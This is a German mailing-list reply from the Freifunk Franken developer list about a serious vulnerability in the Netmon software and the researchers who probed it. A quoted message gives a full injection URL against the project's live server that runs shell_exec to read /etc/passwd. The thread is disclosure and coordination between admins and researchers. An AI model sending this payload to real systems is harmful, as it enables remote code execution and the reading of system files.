[Freifunk Franken] Fwd: Schwere Sicherheitlücke in Netmon

Tim Niemeyer tim.niemeyer at mastersword.de
Mo Mär 23 16:31:22 CET 2015


Hallo Johannes,

* Johannes Meyer <mail at meyerjohannes.de> [23-03-15 15:24]:
> Diese angeblichen "Hacks" die da bei euch angefallen sein sollen waren
> wohl eindeutig wir bei der Recherche.
Ah, ok. Danke für die Info.

> 
> Befehl:
> https://netmon.freifunk-franken.de/api.php?section=1&class=echo+shell_exec%28%27cat+/etc/passwd%27%29%3b+%2f%2f
> 
> Tim ist seit 22.03.2015 00:52 vom Ansbacher Stesie informiert und mit
> einem Patch versorgt. Der Fehler ist bereits 7 Tage zuvor an alle
Beim nächsten mal bitte mir oder einem der anderem Admins Bescheid
geben.

Tim
-------------- nächster Teil --------------
Ein Dateianhang mit Binärdaten wurde abgetrennt...
Dateiname   : signature.asc
Dateityp    : application/pgp-signature
Dateigröße  : 836 bytes
Beschreibung: Digital signature
URL         : <http://lists.freifunk.net/pipermail/franken-dev-freifunk.net/attachments/20150323/cfa70b3a/attachment-0002.sig>


Mehr Informationen über die Mailingliste franken-dev